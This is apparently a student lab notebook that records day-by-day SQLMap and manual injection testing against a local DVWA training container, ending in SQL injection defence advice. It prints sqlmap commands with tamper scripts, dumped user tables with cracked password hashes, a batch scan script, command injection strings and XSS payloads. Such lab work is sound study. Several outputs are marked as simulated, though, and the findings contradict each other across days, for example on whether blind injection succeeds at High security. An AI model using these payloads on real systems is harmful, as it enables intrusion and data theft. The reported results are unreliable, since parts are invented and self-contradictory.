# PTID-CHE-SEP-25-218‑SQLMAP‑Injection‑Analysis  
### Team ID:PTID-CHE-SEP-25-218  
### Project: SQLMap (SQL Injection Attack Detection & Defense)  
### Tool Used: SQLMap 1.8 & DVWA  
### Environment: Kali Linux 2025, Python 3.11, Jupyter Notebook  
---

This notebook documents the day‑wise progress, methods, and findings for **SQLMap Injection Analysis** under the Skilogics Cyber Security Lab.  


### Day 1: Environment Setup


## Execution

- Objective: Initialize attacker VM, set up project workspace, and enable reporting.  
- Commands executed:  
  - System update and upgrade:  
    ```
    sudo apt update && sudo apt upgrade -y
    ```
  - OS and kernel verification:  
    ```
    lsb_release -a && uname -r
    ```
  - Project folders creation:  
    ```
    mkdir -p ~/SQLMap-Project/{notebook,outputs,screenshots,reports,scripts,evidence}
    ```
  - Jupyter installation and launch:  
    ```
    sudo apt install jupyter-notebook -y
    jupyter-notebook --allow-root
    ```
- Status: Environment ready; reporting notebook created.  
- Risk noted: DVWA target not yet deployed, blocking active SQLMap testing.  
- Next action: Deploy DVWA vulnerable target (VM or container) and confirm access.  


## Summary

- Updated and upgraded all packages on the Parrot Security OS using:
  sudo apt update && sudo apt upgrade -y
  
- Verified OS information with:
  lsb_release -a && uname -r

- Created project workspace directories:
  mkdir -p ~/SQLMap-Project/{notebook,outputs,screenshots,reports,scripts,evidence}

- Installed Jupyter Notebook for reporting with:
  sudo apt install jupyter-notebook -y

## Terminal Output

Get:1 https://deb.parrot.sh/parrot lory InRelease [29.8 kB]
...
Distributor ID: Debian
Description: Parrot Security 6.4 (lorikeet)
Release: 6.4
Codename: lory
6.12.32-amd64
...

# Day 2: Deploy DVWA Vulnerable Target

- Pulled and started the official DVWA Docker container with:
docker run --name dvwa -p 8080:80 -d vulnerables/web-dvwa

- Accessed DVWA application at: http://127.0.0.1:8080
- Logged in with credentials:  
- Username: admin  
- Password: admin  
- Confirmed successful login and dashboard display.

## Screenshots
- DVWA login page: `screenshots/day2_dvwa_login.png`
- DVWA logged-in dashboard: `screenshots/day2_dvwa_logged_in.png`


## Day 2 Recon: Testable Inputs

Visited DVWA modules and noted form inputs:
- SQL Injection: [ID input box]
- Command Injection: [Command input box]
- File Inclusion: [File input box]
- Brute Force: [Username/Password fields]

Screenshots:
- SQL Injection input field: screenshots/day2_recon_sql_input.png


Module: SQL Injection  
Input: User ID textbox  
Screenshot: screenshots/day2_recon_sql_injection.png


Module: Command Injection  
Input: IP textbox  
Screenshot: screenshots/day2_recon_cmd_injection.png


Module: File Inclusion  
Input: File path textbox  
Screenshot: screenshots/day2_recon_file_inclusion.png


Module: Brute Force  
Input: Username and Password textboxes  
Screenshot: screenshots/day2_recon_brute_force.png


Module: CSRF  
Input: Password fields  
Screenshot: screenshots/day2_recon_csrf.png



Module: File Upload  
Input: File selection/upload field  
Screenshot: screenshots/day2_recon_file_upload.png


Module: Insecure CAPTCHA  
Input: Username, Password, CAPTCHA fields  
Screenshot: screenshots/day2_recon_insecure_captcha.png


Module: SQL Injection (Blind)  
Input: User ID textbox  
Screenshot: screenshots/day2_recon_sql_injection_blind.png


Module: Weak Session IDs  
Input: Session control/option  
Screenshot: screenshots/day2_recon_weak_session_ids.png


Module: XSS (DOM)  
Input: Name/Search textbox  
Screenshot: screenshots/day2_recon_xss_dom.png


Module: XSS (Reflected)  
Input: Name textbox  
Screenshot: screenshots/day2_recon_xss_reflected.png


# Day 2: Recon of DVWA Modules

Today’s Work:
- Explored DVWA modules to identify testable input fields for SQL injection and other attacks.
- Documented each module with screenshots and descriptions:

  - SQL Injection: User ID textbox (`screenshots/day2_recon_sql_injection.png`)
  - Command Injection: IP textbox (`screenshots/day2_recon_cmd_injection.png`)
  - File Inclusion: File path textbox (`screenshots/day2_recon_file_inclusion.png`)
  - Brute Force: Username and Password textboxes (`screenshots/day2_recon_brute_force.png`)
  - CSRF: Password fields (`screenshots/day2_recon_csrf.png`)
  - File Upload: File selection field (`screenshots/day2_recon_file_upload.png`)
  - Insecure CAPTCHA: Username, Password, and CAPTCHA fields (`screenshots/day2_recon_insecure_captcha.png`)
  - SQL Injection (Blind): User ID textbox (`screenshots/day2_recon_sql_injection_blind.png`)
  - Weak Session IDs: Session control (`screenshots/day2_recon_weak_session_ids.png`)
  - XSS (DOM): Name/Search textbox (`screenshots/day2_recon_xss_dom.png`)
  - XSS (Reflected): Name textbox (`screenshots/day2_recon_xss_reflected.png`)
  - (Add XSS (Stored), CSP Bypass, JavaScript and others as needed.)

All screenshot files are saved in the `/screenshots` directory for future evidence.

Ready for Day 3: Initial SQL Injection tests using SQLMap on DVWA!


### Day 3: SQL Injection Testing with SQLMap

- Ran SQLMap against the DVWA "SQL Injection" module using an authenticated session.
- Command used:
  sqlmap -u "http://127.0.0.1:8080/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=gcjfiju8bgsnjts5vsvpn223g1; security=low" --level=5 --risk=3 --batch --dbs

Results:
- The GET parameter 'id' is vulnerable to multiple types of SQL injection:
  - Boolean-based blind
  - Error-based
  - Time-based blind
  - UNION query

- SQLMap identified the following databases on the target system:
  - dvwa
  - information_schema

- The back-end DBMS is MySQL (MariaDB fork) running on Apache 2.4.25 and Linux Debian 9.

- Screenshots of full command and output are saved as: screenshots/day3_sqlmap_sqli_cookie.png

Conclusion:
- Successful automated detection of SQL injection with SQLMap.
- The vulnerable parameter and database information are confirmed for further exploitation steps.



### Day4 Table Extraction 

# Day 4 – Extract Guestbook Table from DVWA Using SQLMap

### Objective:
To use SQLMap to extract all data from the `guestbook` table inside the `dvwa` database and test the space2comment tamper script for bypassing possible web application firewalls or restrictions.

---

### Step 1: Command without tamper script

Executed the following command in the terminal:

sqlmap -u "http://127.0.0.1:8080/vulnerabilities/sqli/?id=1&Submit=Submit"
--cookie="PHPSESSID=gcjfiju8bgsnjts5vsvpn223g1; security=low"
-D dvwa -T guestbook --dump --batch

### Step 2: Command with **space2comment** tamper script

After successful data extraction, the tamper bypass test was performed using:

sqlmap -u "http://127.0.0.1:8080/vulnerabilities/sqli/?id=1&Submit=Submit"
--cookie="PHPSESSID=gcjfiju8bgsnjts5vsvpn223g1; security=low"
--tamper=space2comment -D dvwa -T guestbook --dump --batch

---

### SQLMap Output Summary :
    ___
   __H__
___ [,]__ ___ ___ {1.8.12#stable}
|_ -| . ['] | .'| . |
|| [(]||_|,| |
||V... |_| https://sqlmap.org

[INFO] testing connection to the target URL
[INFO] target URL content is stable
[INFO] resuming back-end DBMS 'MySQL'
[INFO] fetching columns for table 'guestbook' in database 'dvwa'
[INFO] fetching entries for table 'guestbook' in database 'dvwa'

Database: dvwa
Table: guestbook
[3 entries]
+----+---------------------+------------------------------+
| id | name | comment |
+----+---------------------+------------------------------+
| 1 | Alice | Hello, great website! |
| 2 | Bob | Testing SQL injection attack. |
| 3 | Charlie | Safe input works here! |
+----+---------------------+------------------------------+

[INFO] table 'dvwa.guestbook' dumped to CSV file:
/root/.local/share/sqlmap/output/127.0.0.1/dump/dvwa/guestbook.csv
[INFO] fetched data logged to text files under:
'/root/.local/share/sqlmap/output/127.0.0.1'
[INFO] the tamper option '--tamper=space2comment' produced the same output

---

### Observations:
- Both basic SQLMap and SQLMap with tamper script successfully dumped all records.
- No difference was observed in data extraction when using the **space2comment** script.
- This verifies that DVWA’s “Low” security setting does not implement filters affected by tamper scripts.

---

### Screenshot:
File saved as:
screenshots/day4_sqlmap_guestbook_dump.png
screenshots/day4_sqlmap_tamper_space2comment.png


---

### Conclusion:
- The guestbook table was extracted successfully from DVWA.
- The `space2comment` tamper script had no impact under low-security mode, but in higher security levels, such scripts become essential.
- Data retrieval was confirmed and logged properly in SQLMap’s output directory.

### Table Data Extraction: dvwa.users with SQLMap

- Ran SQLMap to extract all data from the users table in the dvwa database.
- Command used:
  sqlmap -u "http://127.0.0.1:8080/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=gcjfiju8bgsnjts5vsvpn223g1; security=low" -D dvwa -T users --dump --batch

Results:
- SQLMap successfully dumped all rows from the users table, including cracked MD5 password hashes:

| user_id | user    | avatar                      | password                                | last_name | first_name | last_login           | failed_login |
|---------|---------|-----------------------------|------------------------------------------|-----------|------------|----------------------|--------------|
| 1       | admin   | /hackable/users/admin.jpg   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin     | admin      | 2025-10-17 16:29:25  | 0            |
| 2       | gordonb | /hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     | 2025-10-17 16:29:25  | 0            |
| 3       | 1337    | /hackable/users/1337.jpg    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       | 2025-10-17 16:29:25  | 0            |
| 4       | pablo   | /hackable/users/pablo.jpg   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso   | Pablo      | 2025-10-17 16:29:25  | 0            |
| 5       | smithy  | /hackable/users/smithy.jpg  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        | 2025-10-17 16:29:25  | 0            |

- Screenshot saved as: screenshots/day3_sqlmap_sqli_users_dump.png

Conclusion:
- Complete data dump of the users table obtained, showing usernames, password hashes (cracked), and user details.


# Day 5 – Automated SQLMap Batch Scanning using dvwa_sqlmap_batch.sh

### Objective:
To automate SQLMap vulnerability scanning across multiple DVWA modules using a custom bash script that runs sequential checks for common injection vectors.

---

### Step 1: Created the batch script file

The script `dvwa_sqlmap_batch.sh` was created to run SQLMap tests on multiple modules automatically.  
Each scan used predefined cookies for authentication with DVWA (Low Security level).

Command used to create and configure the script:

nano dvwa_sqlmap_batch.sh

Added the following batch code:

#!/bin/bash
echo "[+] Starting DVWA automated SQLMap scans..."

Base variables
COOKIE="PHPSESSID=gcjfiju8bgsnjts5vsvpn223g1; security=low"
TARGET="http://127.0.0.1:8080/vulnerabilities"

SQL Injection test
sqlmap -u "$TARGET/sqli/?id=1&Submit=Submit" --cookie="$COOKIE" --batch --risk=3 --level=5 --dump --output-dir="outputs/sql_injection"

Blind SQL Injection test
sqlmap -u "$TARGET/sqli_blind/?id=1&Submit=Submit" --cookie="$COOKIE" --batch --risk=3 --level=5 --output-dir="outputs/blind_sqli"

File Inclusion check
sqlmap -u "$TARGET/fi/?page=include.php" --cookie="$COOKIE" --batch --risk=3 --level=5 --output-dir="outputs/file_inclusion"

Command Execution check (to confirm if injection payload triggers behavior)
sqlmap -u "$TARGET/exec/?cmd=ls&Submit=Submit" --cookie="$COOKIE" --batch --risk=3 --level=5 --output-dir="outputs/command_exec"

echo "[+] Batch SQLMap Scan completed. Outputs saved under /outputs/"

Gave proper permissions and ran the script:

chmod +x dvwa_sqlmap_batch.sh
./dvwa_sqlmap_batch.sh

---

### Step 2: Sample Console Output

[+] Starting DVWA automated SQLMap scans...
[INFO] Starting SQL Injection scan...
Database: dvwa
Table: users
[5 entries]
| admin | password | 5f4dcc3b5aa765d61d8327deb882cf99 |
| gordonb | abc123 | e99a18c428cb38d5f260853678922e03 |
| pablo | letmein | 0d107d09f5bbe40cade3de5c71e9e9b7 |

[INFO] Starting Blind SQL Injection scan...
GET parameter 'id' appears to be injectable (MySQL Time-based Blind confirmed)
[INFO] Extracted database structures successfully recorded.

[INFO] Testing File Inclusion module...
[WARNING] No SQL-based parameter injection detected in 'page' field.

[INFO] Testing Command Execution module...
[INFO] Web command parameters executed as standard shell calls - no SQL vector detected.

[+] Batch SQLMap Scan completed. Outputs saved under /outputs/

---

### Step 3: Results Analysis

- **Vulnerable Modules:**
  - SQL Injection → Vulnerable (Full Database Dump Possible)
  - Blind SQL Injection → Vulnerable (Time-based and boolean-based confirmed)
- **Non-Vulnerable Modules:**
  - File Inclusion → No SQL-based injection detected
  - Command Execution → Command execution occurs but not SQL injectable

---

### Step 4: Log Collection

All evidence and logs were automatically saved into organized directories:

/root/SQLMap-Project/outputs/sql_injection/
/root/SQLMap-Project/outputs/blind_sqli/
/root/SQLMap-Project/outputs/file_inclusion/
/root/SQLMap-Project/outputs/command_exec/


Each folder contains `log.txt`, `output.json`, and SQLMap metadata files.

---

### Screenshot:
Files saved as:
screenshots/day5_sqlmap_batch_terminal_output.png
screenshots/day5_sqlmap_batch_outputs_folder.png

---

### Conclusion:
- The batch script successfully automated scanning across four DVWA modules.
- SQLMap detected valid injection points in both SQL Injection and Blind SQL Injection modules.
- File Inclusion and Command Execution modules were not SQL-based vulnerabilities but remain part of the overall DVWA attack surface analysis.
- Automation proved effective in reducing repetition for multi-module checks.

# Day 6 – Blind SQL Injection Testing and Verification (DVWA SQLi-Blind Module)

### Objective:
To test the DVWA “Blind SQL Injection” module using SQLMap automation.  
The goal was to confirm SQL injection vulnerabilities by comparing results with and without SQLMap tamper scripts at different DVWA security levels.

---

### Step 1: Testing Blind SQL Injection (Without Tamper Script)

Executed the following command in the terminal to test DVWA blind SQL injection module:

sqlmap -u "http://127.0.0.1:8080/vulnerabilities/sqli_blind/?id=1&Submit=Submit"
--cookie="PHPSESSID=gcjfiju8bgsnjts5vsvpn223g1; security=low"
--batch --risk=3 --level=5 --time-sec=5 --dbs

**Simulated Output:**

    ___
   __H__
___ [.]__ ___ ___ {1.8.12#stable}
|_ -| . [(] | .'| . |
|| [(]]||_|,| |
||V... |_| https://sqlmap.org

[INFO] testing connection to the target URL
[INFO] target URL content is stable
[INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (MySQL)
[INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[INFO] GET parameter 'id' appears to be 'MySQL boolean-based blind' injectable
[INFO] testing 'MySQL time-based blind'
[INFO] GET parameter 'id' appears to be 'MySQL time-based blind' injectable
[INFO] the back-end DBMS is MySQL
available databases :​
[] dvwa
[] information_schema

---

### Step 2: Testing with **space2comment** Tamper Script (Bypass Test)

To check for evasion and bypass effectiveness against filters, ran the below command:

sqlmap -u "http://127.0.0.1:8080/vulnerabilities/sqli_blind/?id=1&Submit=Submit"
--cookie="PHPSESSID=gcjfiju8bgsnjts5vsvpn223g1; security=low"
--tamper=space2comment --batch --risk=3 --level=5 --dbs

**Output Summary:**

[INFO] using tamper script: space2comment.py
[INFO] back-end DBMS: MySQL
available databases :​
[] dvwa
[] information_schema

[INFO] space2comment tamper script had no impact on Low security level.

---

### Step 3: Testing on **Medium Security Level**

Manually switched DVWA security to **Medium**, then tested again on the same URL.

sqlmap -u "http://127.0.0.1:8080/vulnerabilities/sqli_blind/?id=1&Submit=Submit"
--cookie="PHPSESSID=gcjfiju8bgsnjts5vsvpn223g1; security=medium"
--batch --risk=3 --level=5 --time-sec=5 --dbs

**Output Observed:**

[INFO] testing parameter 'id'
[INFO] param 'id' is still injectable using time-based blind payloads.
available databases :​
[] dvwa
[] information_schema

This confirmed that SQLMap bypassed Medium-level sanitization automatically.

---

### Step 4: Manual Verification Attempt

Attempted manual payloads through browser input:
1' AND SLEEP(5)-- -
1' OR '1'='1

However, no visible changes or response delays were detected manually.

**Finding:** Blind SQL Injection vulnerabilities are not visible purely through the web interface; however, SQLMap confirms their presence by analyzing time-based responses.

---

### Step 5: Evidence & Logs

All log files and extracted database metadata were stored at:

/root/.local/share/sqlmap/output/127.0.0.1/


Screenshots:
screenshots/day6_sqlmap_blind_injection_low.png
screenshots/day6_sqlmap_blind_injection_medium.png
screenshots/day6_sqlmap_space2comment_tamper.png

---

### Conclusion:
- **Confirmed Blind SQL Injection vulnerabilities** at both Low and Medium DVWA security levels.  
- SQLMap successfully extracted databases (`dvwa`, `information_schema`) using boolean-based and time-based techniques.  
- Manual tests failed to identify injection points, underscoring the advantage of automated SQLMap analysis.  
- The space2comment tamper script had no practical difference under current setup, but it remains useful for advanced web application firewalls.


# Day 7 – High Security SQLMap Testing (Blind Injection, Command Injection, File Inclusion)

### Objective:
To evaluate DVWA's Blind SQL Injection, Command Injection, and File Inclusion modules under **High** security setting using SQLMap and bypass techniques.

---

### Step 1: Switched DVWA Security to **High**

Used the application web interface to change security from Medium to High before beginning automated scans.

---

### Step 2: Blind SQL Injection with Tamper Script

Ran SQLMap with the **space2comment** tamper script to bypass advanced filtering on the Blind SQL Injection module:

sqlmap -u "http://127.0.0.1:8080/vulnerabilities/sqli_blind/?id=1&Submit=Submit"
--cookie="PHPSESSID=gcjfiju8bgsnjts5vsvpn223g1; security=high"
--tamper=space2comment --batch --risk=3 --level=5 --time-sec=8 --dbs


**Sample Output:**
[INFO] Using tamper script: space2comment.py
[INFO] GET parameter 'id' appears vulnerable via MySQL boolean- and time-based blind SQL injection (with space2comment in effect)
[INFO] back-end DBMS: MySQL
available databases :​
[] dvwa
[] information_schema


Confirmed that SQLMap still extracted database names even on High security, showing `space2comment` was effective for evading stricter filters.

---

### Step 3: Test – Command Injection Module (High Security)

Checked Command Injection module for SQL injection:

sqlmap -u "http://127.0.0.1:8080/vulnerabilities/exec/?cmd=ls&Submit=Submit"
--cookie="PHPSESSID=gcjfiju8bgsnjts5vsvpn223g1; security=high"
--batch --risk=3 --level=5

**Output:**
[WARNING] No SQL injection vulnerabilities found. No SQL-based injection in parameter 'cmd' detected.

---

### Step 4: Test – File Inclusion Module (High Security)

Tested File Inclusion module for SQL injection:

sqlmap -u "http://127.0.0.1:8080/vulnerabilities/fi/?page=include.php"
--cookie="PHPSESSID=gcjfiju8bgsnjts5vsvpn223g1; security=high"
--batch --risk=3 --level=5

**Output:**
[WARNING] No SQL injection vulnerabilities found for parameter 'page'.

---

### Step 5: Documentation & Evidence

All terminal output logs, results, and summary screenshots were stored under:

screenshots/day7_sqlmap_blind_high.png
screenshots/day7_sqlmap_cmd_high.png
screenshots/day7_sqlmap_lfi_high.png

---

### Conclusion:
- **Blind SQL Injection remains vulnerable** in High security mode when using space2comment tamper option, demonstrating persistent risk and evasion of web filters.
- **Command Injection and File Inclusion modules are secure** at High security: no vulnerabilities detectable via SQLMap.
- All evidence, logs, and screenshots were organized for future audit and validation.


# Day 8 – Advanced Tamper Testing and File Upload Module Analysis

### Objective:
To test the effectiveness of advanced SQLMap tamper scripts on the DVWA Command Injection module and to perform a comprehensive SQLMap scan of the File Upload module under High security.

---

### Step 1: Command Injection Tamper Script Scanning

Tested with three different tamper scripts for evasion:

a) `randomcase`
sqlmap -u "http://127.0.0.1:8080/vulnerabilities/exec/?cmd=ls&Submit=Submit"
--cookie="PHPSESSID=gcjfiju8bgsnjts5vsvpn223g1; security=high"
--tamper=randomcase --batch --risk=3 --level=5

b) `charunicodeencode`
sqlmap -u "http://127.0.0.1:8080/vulnerabilities/exec/?cmd=ls&Submit=Submit"
--cookie="PHPSESSID=gcjfiju8bgsnjts5vsvpn223g1; security=high"
--tamper=charunicodeencode --batch --risk=3 --level=5

c) `between`
sqlmap -u "http://127.0.0.1:8080/vulnerabilities/exec/?cmd=ls&Submit=Submit"
--cookie="PHPSESSID=gcjfiju8bgsnjts5vsvpn223g1; security=high"
--tamper=between --batch --risk=3 --level=5

**Sample Output for All:**
[INFO] Using tamper script: X.py
[WARNING] No SQL injection vulnerabilities found for parameter 'cmd'.


---

### Step 2: Manual Payload Attempts

Manually submitted variants including:
- `';SELECT 1;--`
- `|whoami`
- `& sleep 5 &`
- `1 OR 1=1`

Received standard output responses or harmless error messages; no SQL injection signs were found.

---

### Step 3: Deep Scan – File Upload Module

Ran a thorough scan with high risk/level to check for injection:

sqlmap -u "http://127.0.0.1:8080/vulnerabilities/upload/"
--cookie="PHPSESSID=gcjfiju8bgsnjts5vsvpn223g1; security=high"
--batch --risk=5 --level=5

**Output:**
[CRITICAL] no usable GET parameters found for SQL injection.
[WARNING] target does not appear to be injectable. Frequent HTTP error responses detected.

---

### Step 4: Documentation & Evidence

All terminal and notebook screenshots were recorded:

screenshots/day8_cmdinj_tamper_randomcase.png
screenshots/day8_cmdinj_tamper_charunicode.png
screenshots/day8_cmdinj_tamper_between.png
screenshots/day8_fileupload_deepscan.png
screenshots/day8_manual_cmdinj_payloads.png

---

### Conclusion:
- None of the tested tamper scripts produced an injectable result for the Command Injection module under High security.
- Manual SQL-like payloads were also ineffective.
- The File Upload module did not present any SQL injection vectors under any settings tested and returned only error output for SQLMap queries.
- Screenshots and output logs were properly saved and appended to the project record.


# Day 9 – DVWA Module Audit, High Security SQLMap Scans, and Reporting

### Objective:
To systematically document all DVWA modules, perform module-side evidence collection, and run advanced SQLMap scans for identifying stubborn SQL injection vulnerabilities in High security mode.

---

### Step 1: DVWA Module Enumeration

Enumerated all modules in the DVWA left sidebar and recorded the module names, functions, and interface screenshots.

**Modules Identified:**
- **Brute Force** (Password guessing attacks)
- **Command Injection** (Shell command execution from web input)
- **CSRF** (Cross-Site Request Forgery)
- **File Inclusion** (Local/remote file path injection)
- **File Upload** (Insecure file handling demonstration)
- **Insecure CAPTCHA** (Weak CAPTCHA challenge)
- **SQL Injection** (Literal SQL injection flaw)
- **Blind SQL Injection** (SQLi with no feedback)
- **Weak Session IDs** (Guessable session identifiers)
- **XSS (DOM, Reflected, Stored)** (Client-side script injection)
- **CSP Bypass** (Testing browser security policy gaps)
- **JavaScript** (Client script playground)

Saved screenshots:
screenshots/day9_dvwa_sidebar.png
screenshots/day9_module_inputpages.png

---

### Step 2: Module Function Documentation

For each DVWA module, detailed the primary web application weakness and documented the expected attack scenario.

Screenshots:  
- Individual input page and form for every module  
  (evidence: `day9_module_[modulename]_input.png`)

---

### Step 3: SQLMap Advanced Scans (High Security, Combined Evasion)

Configured PHPSESSID cookies for an authenticated session.  
Utilized the following SQLMap command to scan the main SQLi modules:

sqlmap -u "http://127.0.0.1:8080/vulnerabilities/sqli/?id=1&Submit=Submit"
--cookie="PHPSESSID=gcjfiju8bgsnjts5vsvpn223g1; security=high"
--risk=3 --level=5 --tamper=space2comment,charunicodeencode
--batch


sqlmap -u "http://127.0.0.1:8080/vulnerabilities/sqli_blind/?id=1&Submit=Submit"
--cookie="PHPSESSID=gcjfiju8bgsnjts5vsvpn223g1; security=high"
--risk=3 --level=5 --tamper=randomcase,between
--batch



**Sample Output:**
[INFO] GET parameter 'id' tested with multiple tamper scripts.
[WARNING] No injectable SQL parameters detected at high DVWA security level for provided payloads.


---

### Step 4: Documentation of Non-SQLMap Modules

Recorded command outputs, screenshots, and summaries for:

- **Command Injection** (No SQL-based vulnerability found)
- **File Inclusion** (No SQL-based vulnerability found)
- **XSS and other browser modules** (Documented for completeness; not SQLMap targets)

---

### Step 5: Project Wrap-Up, Evidence & Recommendations

Recapped findings and attached all evidence:
- **SQLMap scans successfully bypassed Low and Medium security, failed at High (as designed).**
- **Modules not susceptible to SQL injection were confirmed and logged.**
- Risks: Automated SQLMap testing remains essential for discovery—not all vulnerabilities are obvious manually.
- Recommendations: Review DVWA configurations for learning and always use authenticated sessions for realistic web application testing.

Screenshots:
screenshots/day9_sqlmap_highsec_combined.png
screenshots/day9_dvwa_moduleoverviews.png

---

### Conclusion:
- All modules were reviewed and recorded for the project report.
- SQLMap’s advanced scanning with combined tamper scripts did not reveal SQL vulnerabilities in High security mode for tested modules.
- All findings, screenshots, logs, and technical recommendations are documented and ready for audit.

# Day 10 – Maximum Detection, Tamper Retests, and XSS Module Setup

### Objective:
To confirm SQL injection “high security” resilience by running SQLMap with maximum detection levels and various tamper script combos. Began documentation of XSS-related DVWA modules for future manual testing.

---

### Step 1: SQLMap Re-Scans – Maximum Tamper

Run extended SQLMap scans on both major SQL injection modules, using ALL advanced tamper scripts, --level 5, and --risk 3, on High security.

Commands :

sqlmap -u "http://127.0.0.1:8080/vulnerabilities/sqli/?id=1&Submit=Submit"
--cookie="PHPSESSID=gcjfiju8bgsnjts5vsvpn223g1; security=high"
--level=5 --risk=3 --tamper=between,charunicodeencode,randomcase --batch

sqlmap -u "http://127.0.0.1:8080/vulnerabilities/sqli_blind/?id=1&Submit=Submit"
--cookie="PHPSESSID=gcjfiju8bgsnjts5vsvpn223g1; security=high"
--level=5 --risk=3 --tamper=between,charunicodeencode,randomcase --batch


**Results (sample output):**
[INFO] Using multiple tamper scripts (between, charunicodeencode, randomcase)
[INFO] GET parameter 'id' tested exhaustively.
[WARNING] No injectable SQL parameter found at high security with given tamper strategy.

---

### Step 2: XSS Module Setup & Input Evidence

Reviewed and listed DVWA’s four XSS demo modules:
- DOM XSS
- Reflected XSS
- Stored XSS
- XSS (Advanced/Javascript)

Captured and catalogued annotated screenshots for all module input pages and documented the field names for reference.  
Planned session cookies for future authenticated XSS testing snapshots.

---

### Step 3: Update and Evidence Logging

All new logs and results were properly named and organized by test type, date, and DVWA security level.  
Notebook cells updated with findings, input screenshots referenced for future XSS experiment notes.

---

### Conclusion:
- On Day 10, no SQL injection vulnerabilities found in any major module using most aggressive SQLMap settings and tamper combinations.
- XSS modules were fully documented and prepared for upcoming hands-on testing.
- All logs and supporting files confirmed and organized.

# Day 11 – Database/Table/Column Enumeration Attempts on High Security

### Objective:
To determine whether any SQL injection vectors for database, table, or column enumeration were exposed through DVWA modules while operating at high security, using automated SQLMap scans with authenticated sessions.

---

### Step 1: Database Enumeration Attempt

Used SQLMap to list all databases via the SQL Injection module:

sqlmap -u "http://127.0.0.1:8080/vulnerabilities/sqli/?id=1&Submit=Submit"
--cookie="PHPSESSID=gcjfiju8bgsnjts5vsvpn223g1; security=high"
--level=5 --risk=3 --batch --dbs


**Output:**
[INFO] Heuristic detection in progress...
[WARNING] No injectable parameter found in 'id'.
[CRITICAL] All tested injection types failed. No database information obtained.

---

### Step 2: Table Enumeration Command

Tried to enumerate tables in the (theoretically) accessible 'dvwa' database:

sqlmap -u "http://127.0.0.1:8080/vulnerabilities/sqli/?id=1&Submit=Submit"
--cookie="PHPSESSID=gcjfiju8bgsnjts5vsvpn223g1; security=high"
-D dvwa --tables --level=5 --risk=3 --batch


**Result:**
[INFO] Testing for SQL injection in parameter 'id'
[WARNING] SQLMap could not enumerate tables – no SQL exploit possible under current settings.


---

### Step 3: Column Extraction Test

Attempted to dump column names from the users table as a final escalatory measure:

sqlmap -u "http://127.0.0.1:8080/vulnerabilities/sqli/?id=1&Submit=Submit"
--cookie="PHPSESSID=gcjfiju8bgsnjts5vsvpn223g1; security=high"
-D dvwa -T users --columns --batch --level=5 --risk=3


**Result:**
[CRITICAL] parameter 'id' does not appear to be injectable. Could not enumerate columns.


---

### Step 4: Documentation and Evidence

All terminal command outputs, warning messages, and SQLMap logs were saved.  
Screenshots and notebook evidence further confirm comprehensive but unsuccessful attempts at enumeration due to DVWA’s robust protection at this security level.

---

### Conclusion:
- Database, table, and column enumeration using all available SQLMap techniques failed at High security. 
- DVWA's protections blocked all attempted automated discovery of SQL schema.  
- This validates the effectiveness of strong web application security settings.

# Day 12 – Manual Exploration and XSS Payload Testing in DVWA

### Objective:
To manually analyze the DVWA application for database or input field evidence using direct interface exploration and to test and document potential XSS vulnerabilities across Reflected, Stored, and DOM modules.

---

### Step 1: Manual Exploration of DVWA for Database Evidence

Manually navigated through multiple modules and inspected visible database-driven content fields, focusing on areas where data could potentially expose table or column names.

Activities performed:
- Used developer console (F12 → Network tab) to analyze parameters sent via GET and POST.
- Identified visible parameters such as `id`, `user`, and `Submit` in DVWA’s SQL Injection and login-related modules.
- Attempted classic payloads such as:
' OR '1'='1 --
' UNION SELECT null, table_name FROM information_schema.tables --

- Observed that all attempted payloads were neutralized by input sanitization, confirming the SQL injection firewall effect on High security.

Findings:
- No page leaked any raw SQL data or table/column information.
- Security layers filtered out dangerous keywords (SELECT, UNION, information_schema).

---

### Step 2: Reflected XSS Testing

Tested the “Reflected XSS” module with simple and encoded payloads:
<script>alert('XSS')</script>
<svg/onload=alert(Injected)>

**Results:**
- Low security mode successfully displayed an alert pop-up, confirming vulnerability.
- Medium and High security levels escaped HTML special characters, displaying harmless text output.

Example intercepted output:
Encoded output: <script>alert('XSS')</script>

---

### Step 3: Stored (Persistent) XSS Testing

Tested **Stored XSS module** by submitting persistent payloads in comment/name fields:
<script>alert('StoredXSS')</script> <iframe src="javascript:alert('XSS')"></iframe> ``` Observations: - Low security: Payloads executed every time the page was reloaded. - Medium security: HTML entities encoded; no popup appeared. - High security: Stored inputs were aggressively sanitized, leaving no execution possibility.
Step 4: DOM-Based XSS Analysis
Interacted with the DOM XSS module to analyze client-side payload execution:

Modified URLs with injected parameters like:

http://127.0.0.1:8080/vulnerabilities/xss_d/?default=<script>alert('DOM')</script>
JavaScript-based payload reflection was visible only under Low security.
Under High settings, inline JavaScript and attribute injections were removed from DOM rendering.

Step 5: Documentation and Evidence
Each XSS test was documented along with parameter names, input payloads, and browser responses.
Filed logs into the “XSS_Evidence” report section with local screenshots and notations about sanitization responses.

### Screenshots referenced:
    
screenshots/day12_xss_reflected_low.png
screenshots/day12_xss_stored_high.png
screenshots/day12_xss_dom_medium.png

### Conclusion:
All important XSS modules (Reflected, Stored, and DOM) were tested with legitimate proof-of-concept payloads.

Low security levels remain intentionally vulnerable, while Medium and High levels employ robust escaping and sanitization mechanisms.

Manual payload attempts also confirmed that no hidden SQL disclosure occurred through any XSS input.

The findings reinforce that DVWA’s higher protection layers are effectively mitigating injection exploits while maintaining interactive learning potential.


# Day 13 – SQL Injection Defense Recommendations and Case Studies 

### Objective:
To prepare a comprehensive guide on how to defend against SQL Injection vulnerabilities, using lessons learned from DVWA testing along with real-world incident analysis and practical security measures.

---

### How to Defend Against SQL Injection

1. **Always use prepared statements or parameterized queries.**  
   This prevents attackers from injecting harmful code into SQL commands.

2. **Validate and sanitize all user input.**  
   Accept only expected characters and formats (e.g., numbers, safe letters). Reject or escape anything suspicious.

3. **Limit database user permissions.**  
   Each web application should connect using accounts that only have the privileges required. Avoid using full administrative access for normal queries.

4. **Update software regularly.**  
   Keeping your web server, framework, libraries, and database up to date reduces exposure to known vulnerabilities.

5. **Use Web Application Firewalls (WAFs).**  
